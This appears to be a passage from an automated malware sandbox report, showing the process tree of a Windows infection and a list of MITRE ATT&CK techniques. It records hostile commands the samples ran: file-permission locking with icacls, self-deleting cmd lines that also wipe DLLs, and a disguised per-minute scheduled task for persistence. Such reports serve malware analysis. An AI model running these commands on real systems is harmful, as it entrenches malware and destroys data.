      PID:1640
    - - C:\Users\Admin\Documents\rMeUZR9j8oQOGyDqBFGf0fVX.exe
        
        "C:\Users\Admin\Documents\rMeUZR9j8oQOGyDqBFGf0fVX.exe"
        5⤵
        
        PID:3496
  - - C:\Users\Admin\Documents\9tRJkIKMQHefHz_vI6osjKIy.exe
      "C:\Users\Admin\Documents\9tRJkIKMQHefHz_vI6osjKIy.exe"
      4⤵
      PID:4056
  - - C:\Users\Admin\Documents\bA3kbn_kiA92il_qPjUZ3Jp4.exe
      "C:\Users\Admin\Documents\bA3kbn_kiA92il_qPjUZ3Jp4.exe"
      4⤵
      PID:3868
  - - C:\Users\Admin\Documents\bhlYRDbkTuZxWgG5DN92q_0I.exe
      "C:\Users\Admin\Documents\bhlYRDbkTuZxWgG5DN92q_0I.exe"
      4⤵
      PID:2280
  - - C:\Users\Admin\Documents\JFvFUQDg8fEkZ7HmuIt8XwKE.exe
      "C:\Users\Admin\Documents\JFvFUQDg8fEkZ7HmuIt8XwKE.exe"
      4⤵
      PID:2156
  - - C:\Users\Admin\Documents\zm9MlCy0hiDxfCkS2pSAgHxM.exe
      "C:\Users\Admin\Documents\zm9MlCy0hiDxfCkS2pSAgHxM.exe"
      4⤵
      PID:3996
  - - C:\Users\Admin\Documents\dYDVATCCkqKX3GapkBoJWebf.exe
      "C:\Users\Admin\Documents\dYDVATCCkqKX3GapkBoJWebf.exe"
      4⤵
      PID:3264
    - - C:\Users\Admin\AppData\Local\Temp\is-4NKLC.tmp\dYDVATCCkqKX3GapkBoJWebf.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4NKLC.tmp\dYDVATCCkqKX3GapkBoJWebf.tmp" /SL5="$700C8,138429,56832,C:\Users\Admin\Documents\dYDVATCCkqKX3GapkBoJWebf.exe"
        5⤵
        
        PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "958091398-11280149551857624212196956800554221320-1555659454-1598336368-478438671"
1⤵
- Executes dropped EXE
PID:2452

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:2336
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A55E8581B6030538D05E29C7E17DB1DC C
  2⤵
  PID:3500
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 89FB4E0E96038E517C598529F1A129D0
  2⤵
  PID:4400
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 91DFDFE9ABDD4DB2A25F993C6A747142 C
  2⤵
  PID:3080
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 33BBA33415A0F80627DC56F560E9A89B C
  2⤵
  PID:3800

C:\Users\Admin\AppData\Local\Temp\A4E7.exe
C:\Users\Admin\AppData\Local\Temp\A4E7.exe
1⤵
PID:1764
- C:\Users\Admin\AppData\Local\Temp\A4E7.exe
  C:\Users\Admin\AppData\Local\Temp\A4E7.exe
  2⤵
  PID:1244
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\487a5700-c070-4ee2-b3f9-40b5a261a643" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:4384
- - C:\Users\Admin\AppData\Local\Temp\A4E7.exe
    "C:\Users\Admin\AppData\Local\Temp\A4E7.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\A4E7.exe
      "C:\Users\Admin\AppData\Local\Temp\A4E7.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:4384
    - - C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build2.exe
        
        "C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build2.exe"
        5⤵
        
        PID:5036
      - C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build2.exe
        
        "C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build2.exe"
        6⤵
        
        PID:3024
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:4028
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:5056
    - - C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build3.exe
        
        "C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build3.exe"
        5⤵
        
        PID:5100
      - C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build3.exe
        
        "C:\Users\Admin\AppData\Local\641d2db7-a23f-4e52-8a0d-229307bc5d4c\build3.exe"
        6⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:4904

C:\Users\Admin\AppData\Local\Temp\D106.exe
C:\Users\Admin\AppData\Local\Temp\D106.exe
1⤵
PID:3624

C:\Windows\system32\taskeng.exe
taskeng.exe {E3D7A86D-F5AF-425C-BF68-CDA93C81D1C0} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:3504
- C:\Users\Admin\AppData\Roaming\furfjaj
  C:\Users\Admin\AppData\Roaming\furfjaj
  2⤵
  PID:2956
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:1784
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4884
- C:\Users\Admin\AppData\Local\487a5700-c070-4ee2-b3f9-40b5a261a643\A4E7.exe
  C:\Users\Admin\AppData\Local\487a5700-c070-4ee2-b3f9-40b5a261a643\A4E7.exe --Task
  2⤵
  PID:2376
- - C:\Users\Admin\AppData\Local\487a5700-c070-4ee2-b3f9-40b5a261a643\A4E7.exe
    C:\Users\Admin\AppData\Local\487a5700-c070-4ee2-b3f9-40b5a261a643\A4E7.exe --Task
    3⤵
    PID:640
- C:\Users\Admin\AppData\Roaming\furfjaj
  C:\Users\Admin\AppData\Roaming\furfjaj
  2⤵
  PID:5036

C:\Users\Admin\AppData\Local\Temp\m4r0t0cm.x02\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\m4r0t0cm.x02\gcleaner.exe /mixfive
1⤵
PID:3868
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\m4r0t0cm.x02\gcleaner.exe" & exit
  2⤵
  PID:984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "gcleaner.exe" /f
    3⤵
    - Kills process with taskkill
    PID:2324

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery